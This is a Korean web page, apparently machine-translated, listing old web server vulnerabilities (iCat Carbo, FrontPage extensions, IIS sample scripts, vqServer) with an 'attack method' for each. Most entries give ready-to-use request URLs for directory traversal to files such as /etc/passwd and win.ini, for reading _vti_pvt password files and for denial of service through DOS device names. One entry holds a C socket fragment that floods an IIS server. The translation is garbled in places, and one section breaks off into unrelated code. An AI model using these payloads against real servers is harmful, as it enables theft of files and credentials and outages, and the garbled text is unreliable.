수 집 된 고전 구멍 1/2 페이지 상세 설명

☆carbo.dll☆  
iCat 카 보 서버 의 인터넷 쇼핑 프로그램 PC 가 최고의 인터넷 쇼핑 소프트웨어 로 잡다 하 게 평가 되 었 다.안전 전문가 Mikael 요한 슨 발견 iCat Carbo 서버 버 전 3.0.0.에 구멍 이 하나 있 습 니 다. 
이 구멍 은 시스템 에 있 는 모든 파일 을 볼 수 있 습 니 다.(파일 을 제외 하고 특수 문자)  
공격 방법:  
이러한 http 요청 제출 :  
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog  
http 는 다음 과 같이 응답 합 니 다.  
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]  
Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'  
win.ini 파일 보기: c:\winnt\win.ini:  
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog  
___________________________________________________________________________  
☆uploader.exe☆  
NT 를 웹 서버 운영 체제 로 사용 하면 침입 자 는 uploader.exe 를 이용 하여 모든 파일 을 업로드 할 수 있 습 니 다.  
공격 방법: http://host/cgi-win/uploader.exe  
업로드 페이지 로 안내 해 드 리 겠 습 니 다.나머지 는 제 가 알려 드 리 지 않 아 도 되 겠 죠?:)  
___________________________________________________________________________  
☆search97.vts☆  
이 파일 은 침입 자가 시스템 에서 httpd 사용자 가 읽 을 수 있 는 파일 을 임의로 읽 을 수 있 도록 합 니 다.  
공격 방법: http://www.xxx.com/search97.vts  
?HLNavigate=On&querytext=dcm  
&ServerKey=Primary  
&ResultTemplate=../../../../../../../etc/passwd  
&ResultStyle=simple  
&ResultCount=20  
&collection=books  
___________________________________________________________________________  
☆newdsn.exe☆  
/script/tools 디 렉 터 리 에 존재 하 는 new dsn.exe 파일 은 모든 사용자 가 웹 루트 디 렉 터 리 에서 파일 을 만 들 수 있 도록 합 니 다.또한 특정 조건 하에 서 는
newdsn.exe 를 이용 하여 IIS 가 서비스 거부 공격 을 받 을 수 있 으 며,공격 에 성공 하면 IIS 가 연결 요청 에 응답 하지 않 습 니 다.  
공격 방법:  
1. 파일 생 성:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=Evil2+samples+from+microsoft&dbq=../../evil2.htm&newdb=CREATE_DB&attr=  
2. D.o.s 공격:다음 연결 요청 을 제출 합 니 다.  
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  
IIS 가 문제 가 있 는 버 전이 라면 브 라 우 저 는 어떤 정보 도 표시 하지 않 습 니 다.다음 두 가지 상황 중 어느 하나 가 발생 하면 서 비 스 를 거부 할 수 있 습 니 다.  
- WWW 서 비 스 를 다시 시작 할 때: 이것 은 IIS 를 끊 게 할 것 이다.WWW 서 비 스 를 다시 시작 할 수 없습니다.항상'포트 가 점용 되 었 습 니 다'라 는 오류 메시지 가 표 시 됩 니 다.  
- WWW 서비스 정지: IIS 가 멈 춰 요. 。그러나 IIS 의 데이터베이스 부분 은 죽지 않 고 80 포트 에서 보 내 온 요청 에 응답 하기 때문에 
요청 을 다시 제출 하면: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  
IIS 는 보호 오류 가 발생 할 수 있 습 니 다.  
___________________________________________________________________________  
☆service.pwd☆  
http://www.hostname.com/_vti_pvt/service.pwd 읽 을 수 있 습 니 다.사용자 암호 정 보 를 노출 합 니 다.  
공격 방법:  
방문 하 다.http://host/_vti_pvt/service.pwd [서비스.pwd]는 바로 필요 한 암호 파일 입 니 다.만약 우리 가 부주의 한 네트워크 관리 에 권한 이 없다 면 브 라 우 저 는 상대방 의 암호 파일 을 표시 할 것 입 니 다.  
___________________________________________________________________________  
☆users.pwd☆  
유 닉 스 시스템 의http://www.hostname.com/_vti_pvt/users.pwd 읽 을 수 있 습 니 다.사용자 암호 정 보 를 노출 합 니 다.  
공격 방법:  
방문 하 다.http://www.hostname.com/_vti_pvt/users.pwd。  
___________________________________________________________________________  
☆authors.pwd☆  
유 닉 스 시스템 의http://www.hostname.com/_vti_pvt/authors.pwd 읽 을 수 있 습 니 다.사용자 암호 정 보 를 노출 합 니 다.  
공격 방법:  
방문 하 다.http://www.hostname.com/_vti_pvt/authors.pwd。  
___________________________________________________________________________  
☆administrators.pwd☆  
유 닉 스 시스템 의http://www.hostname.com/_vti_pvt/administrators.pwd 읽 을 수 있 습 니 다.사용자 암호 정 보 를 노출 합 니 다.  
공격 방법:  
방문 하 다.http://www.hostname.com/_vti_pvt/administrators.pwd。  
___________________________________________________________________________  
☆shtml.dll☆  
Frontpage 에서 Extention Server/Windows2000 서버 에 존재 하지 않 는 파일 을 입력 하면 웹 디 렉 터 리 의 로 컬 경로 정 보 를 얻 을 수 있 습 니 다.
 그러나 HTML,SHTML 또는 ASP 접미사 가 아 닌 파일 을 요청 하면 서로 다른 정 보 를 얻 을 수 있 습 니 다. http://TrustedServer하면,만약,만약...
위 에서 지정 한 링크,스 크 립 트 는 HTTP 요청 을 통 해 클 라 이언 트 에서 신뢰 할 수 있 는 사이트 로 전송 되 며,신뢰 할 수 있 는 사이트 에서 이 스 크 립 트 를 오류 정보의 일부분 으로 되 돌려 줍 니 다.
호구 단.클 라 이언 트 는 이 스 크 립 트 를 포함 하 는 오류 페이지 를 받 았 을 때 이 스 크 립 트 를 실행 하고 신뢰 할 수 있 는 사이트 의 내용 에 대한 모든 권한 을 부여 합 니 다.그리고
shtml.dll 은 html 접미사 가 있 는 긴 파일 이름 을 식별 하고 처리 합 니 다.이 를 이용 하여 IIS 서버 에 DOS 공격 을 수행 할 수 있 습 니 다.아래 프로그램 은...
대상 서버 의 CPU 점유 율 을 달성 할 수 있 습 니 다. 100%,모든 프로그램 로그 공간 을 소모 합 니 다.시스템 은 몇 분 안에 프로그램 로그 가 가득 찼 다 고 보고 할 것 입 니 다.  
공격 방법:  
1. 노출 경로:http://www.victim.com/_vti_bin/shtml.dll/something.html  
이렇게 하면 다음 정 보 를 되 돌려 줍 니 다.  
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.  
2. 신뢰 할 수 있 는 사이트 실행 스 크 립 트:다음 형식의 URL 을 사용 합 니 다.  
serv_addr.sin_family =AF_INET;  
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");  
serv_addr.sin_port = htons(80);  
if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)  
{  
printf("Create Socket faild ");  
return ;  
}  
if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)  
{  
printf("Connect faild ");;  
}  
else  
{  
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );  
for (lDo = 0 ;lDo < 7000;lDo ++)  
{  
lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;  
if (lLen < 0 )  
{  
printf("Send faild ");  
return;  
}  
}  
lLen = send ( sockfd,"tzl.html HTTP/1.0",strlen("tzl.html HTTP/1.0") + 1,0) ;  
//recv(sockfd,buffer,2000,0);  
//printf(buffer);  
//printf("");  
}  
closesocket(sockfd);  
}  
___________________________________________________________________________  
☆shtml.exe☆  
마이크로소프트 FrontPage Server Extensions 에 원 격 서비스 거부 구멍 이 존재 합 니 다.웹 사이트 의 모든 FrontPage 작업 을 원 격 으로 닫 을 수 있 습 니 다.
DOS 장치 이름 을 포함 하 는 링크 를 제출 함으로써, FrontPage Server Extensions 가 끊 어 져 후속 요청 에 응답 하지 않 습 니 다.정상 적 인 작업 을 위해 서 는 IIS 를 재가 동 하거나 기 계 를 재가 동 해 야 한다.  
공격 방법:  
이러한 링크 를 제출 하면 FrontPage 가 될 수 있 습 니 다. Server 확장 정지 응답: http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/
prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe
/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_
vti_bin/shtml.exe/com1 .  
___________________________________________________________________________  
☆queryhit.htm☆  
query hit.htm 에서 검색 페이지 를 제시 하면 이 파일 들 을 검색 하고 볼 수 있 습 니 다.  
공격 방법:  
방문 하 다.http://www.victim.com/samples/search/queryhit.htm 페이지 를 검색 한 다음 파일 찾기 대화 상자 에 다음 문자열 을 입력 하 십시오.
[\#filename=*.pwd],[.pwd]를 확장자 로 하 는 암호 파일 에 긴 문자열 이 연결 되 어 있다 면 필요 한 것 입 니 다.  
___________________________________________________________________________  
☆Dotdotdot☆  
vqServer 및 Sybase PowerDynamo 사이트 서버 에 오래된 공격 구멍 이 존재 합 니 다.이 공격 은 점(..)에 대한 공격 입 니 다.이것 은 WINDOW 에 있 기 때 문 입 니 다.
'cd'와 같은 연속 적 인 점 을 등급 연결 로 해석 할 수 있 습 니 다. ...',cd ..\..'.Sybase PowerDynamo,이전 버 전의 vqServer 에서 원 격 공격 허용
WEB 보안 시스템 을 돌아 다른 디 렉 터 리 로 횡단 합 니 다.  
공격 방법:  
CONFIG.SYS 가 루트 디 렉 터 리 에 존재 한다 면 파일 을 읽 을 수 있 습 니 다. http://example.com/...................../config.sys  
루트 디 렉 터 리 를 열거 합 니 다. http://example.com/ /../../../../../../  
___________________________________________________________________________  
☆autoexec.bat☆  
현재 많은 웹 서버 에 이 보안 문제 가 존재 합 니 다.예 를 들 어 Jana. Webserver,URL Live 1.0 웹 서버 등.악의 적 인 사용 자 는 이 구멍 을 이용 할 수 있 습 니 다.
HTTP 종료 루트 디 렉 터 리 를 사용 하여 상위 디 렉 터 리 트 리 에 도달 합 니 다.URL 에서"../"를 사용 하면 공격 자 들 은 WEB 를 획득 할 수 있 습 니 다. SERVER 에서 읽 을 수 있 는 모든 파일.  
공격 방법: :8080/../../../autoexec.bat 원 통 의 autoexec.bat 파일 을 읽 습 니 다.  
이 구멍 의 이용 은 시스템 디 렉 터 리 의 구조 에 달 려 있다.  
___________________________________________________________________________  
☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆  
IIS 4.0 에는 원 격 사용자 가 WEB 서버 의 사용자 계 정 을 공격 할 수 있 도록 하 는 재 미 있 는 특징 이 포함 되 어 있 습 니 다.바로 당신 의 WEB 서버 가 NAT 를 통 해 주 소 를 바 꾸 는 것 입 니 다.
공격 당 할 수도 있어.IIS 4.0 이 설 치 될 때마다 가상 디 렉 터 리/iisdmpwd 를 만 듭 니 다.이 디 렉 터 리 는 여러 개의.htr 파일 을 포함 하고 익명 의 사용자 가 이 파일 에 접근 할 수 있 습 니 다.
이 파일 들 은 마침 규정 없 이 loopback 에 만 제한 되 어 있 습 니 다. addr(127.0.0.1)이 파일 들 을 요청 하면 대화 상자 에서 벗 어 나 WEB 를 통 해 사용자 의 계 정과 비밀 번 호 를 수정 할 수 있 습 니 다.
이 디 렉 터 리 는 아래 디 렉 터 리 에 물리 적 으로 매 핑 됩 니 다:  
c:\winnt\system32\inetsrv\iisadmpwd  
공격 방법:  
접근:http://example.com/iisadmpwd/*.htr 의 페이지,그리고 도 구 를 이용 하여 빈 거 를 합 니 다.  
1 2 다음 페이지 전문 을 읽다

좋은 웹페이지 즐겨찾기